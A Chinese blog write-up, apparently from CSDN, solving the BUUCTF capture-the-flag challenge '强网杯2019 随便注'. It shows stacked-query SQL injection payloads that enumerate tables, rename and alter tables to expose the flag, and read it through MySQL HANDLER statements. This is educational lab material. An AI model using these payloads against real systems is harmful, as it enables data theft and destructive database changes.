BUUCTF --Web--[强网杯2019]随便注

最新推荐文章于 2024-10-04 22:00:00 发布
最新推荐文章于 2024-10-04 22:00:00 发布
阅读量890 收藏 18
点赞数 22
分类专栏: SQL CTF WEB 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68476966/article/details/135729310
版权
SQL 同时被 3 个专栏收录
1 篇文章 0 订阅
订阅专栏
CTF
1 篇文章 0 订阅
订阅专栏
WEB
1 篇文章 0 订阅
订阅专栏

 

第一步:判断是否存在注入

由此可以判断存在SQL注入,接下来判断注入类型

可以判断出是字符型注入,且闭合方式为单引号闭合

第二步:判断字段数

 可以判断出字段数是2

第三步:开始注入

使用select发现,几乎常用的字段都被过滤了。这时可以利用堆叠注入测试一下:

发现是可以行得通的😀

稍稍回顾SQL注入的方法之一:堆叠注入

简单的说就是同时执行多条SQL语句,使用分号表示结束一条SQL语句。

因为过滤了常用函数,查询时可以使用Mysql 的show函数

show命令列出数据库、表、索引的内容,可以利用该函数查看mysql服务器的相关信息

show databases;     列出服务器可以访问的数据库

show tables;          列出数据库相关表名

show columns from tablename;    查询tablename表下的字段

 接下来爆出表名:

可以得到有两个表名:word,1919810931114514

然后查看表中的内容,得到flag信息

查看表words:1'; show columns from words;#

查看表1919810931114514:-1';show columns from 1919810931114514;#

输入语句时要注意这里使用的是反勾号(`)

拓展:在mysql中引号(')与反勾号(`)的区别:(在linux下不区分,但是在windows下区分)

引号主要用于对字符串的引用

反勾号主要用于对数据库、表、列、索引和别名的引用

   在words表中有2个字段:id、data

   在1919810931114514表中有1个字段:flag

这里要注意,在第二步,我们判断出有两个回显位,但是flag所在表中只有1个字段。我们不能用常规的方法读取,需要稍加变形。

姿势一:改表名

先将words表名改成其他名字(不做要求),然后将191表的名字改为words,将字段flag改为id,这样就可以用1' or 1=1#显示出flag

1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);#
-1'; show tables;#

 

1' or 1='1;#

 

 拓展一下alter:

  1. alter table  table_name add column_name type;//添加一个列
  2. alter table  table_name change column1,column2 type;//改列名
  3. alter table  table_name rename column1 to columns2 type;//改列名
  4. alter table  table_name drop column_name type;//删除一个列
  5. alter table  table_name alter column_name type;//改变列数据类型

姿势二:handle

MySQL中的handle是对关系数据库表中的数据进行操作的一种方式。

一个handle实际上就是一个在MySQL服务器上分配的内存对象,它包含有关某个MySQL表的信息。通过该handle,可以对表进行各种操作。

例如,要使用handle读取MySQL数据库表中的数据,可以首先使用mysql_stmt_init()创建handle,然后使用mysql_stmt_prepare()将SQL语句绑定到handle上以执行查询,最后使用mysql_stmt_fetch()通过handle读取数据。

这道题handle的方法:

1、打开表:HANDLER表名OPEN

2、查看数据:

3、关闭表:HANDLER表名 READ CLOSE; 

1';HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ next;HANDLER `1919810931114514` CLOSE;#

 

九小姐
关注
专栏目录
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1387
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1271
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
[强网杯 2019]随便
ChanCherry的博客
11-19 1001
很感谢可以在BUU平台上复现这道题,感谢赵师傅!这篇wp借鉴了大佬的,为了自己日后学习需要就写了,大佬不喜勿喷QAQ 首先要知道堆叠入的原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么...
BUUCTF-强网杯-随便
wuerror的博客
06-30 6537
引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html 1‘ //首先尝试的加引号,报错了 1’ # //正常 1‘ order by 1 # //用order by 测试得到列数为2 1' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...
[强网杯 2019]随便1
qq_48932191的博客
01-19 326
2. 关于预处理语句prepare和execute,相当于变量替换。union select看看,但是被正则过滤了。这里通过拼接字符串实现绕过过滤。单引号闭合,出来了三个数组,好像没啥用。1. 纯数字的的表名要用反引号``包
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2696
buuctf强网杯2019为例的堆叠
BUUCTFweb强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-WEB
ccfly1012的博客
11-02 3882
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1555
SQL入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
SQL Injection8(堆叠入)——强网杯2019随便
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
2019强网杯部分writeup
Sea_Sand息禅
06-04 5622
Web 1、UPLOAD 复现环境https://github.com/CTFTraining/qwb_2019_upload 先看一下网站情况: 是一个册可登录的界面,登陆之后可以上传图片,一个账号只能上传一次。 扫一下后台目录,发现upload是泄露的,www.tar.gz是泄露的。 www.tar.gz下载下来是网站的源码,upload则是我们上传的文件,找到上传文件的源码: &lt...
强网杯2019-web-随便
wyj_1216 House
02-05 1982
题目 writeup 首先根据题目意思,知道是SQL入 尝试进行入 ?inject=1 1' 发现报错,想到利用#进行截断(释掉) 1' # 回显正常 1' and 1=1# 1' and 1=2# 发现没有回显 判断字段数 1' order by 1# 1' order by 2# 1' order by 3# 到3时报错,故知字段数为2 尝试union联...
[GYCTF2020]Blacklist && 强网杯随便
SopRomeo的博客
04-08 1594
强网杯随便 先测试 字符型 1' or '1'='1 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤了select 先看表,看列 堆叠入 payload: 1';show tables;%23 1';show columns from `1919810931114514`;%...
毕业设计_基于springboot+layui+mybatisPlus的中小型仓库物流管理系统源码+SQL+教程+可运行】41004
最新发布
pingguocu3的博客
10-04 943
毕业设计--课程设计--springboot--java 登录管理员账号:system 密码:123456 验证码输入:意验证码字母要大写。启动项目后运行http://locahost:8080跳转到登录界面即可。后端:springboot、mybatis-plus、shiro。application.yml文件中的数据库连接信息。运行sql目录下的warehouse.sql文件。1.基础管理:商品管理、客户管理、供应商管理;2.物流管理:进货管理、发货管理、交付管理...
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 591
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值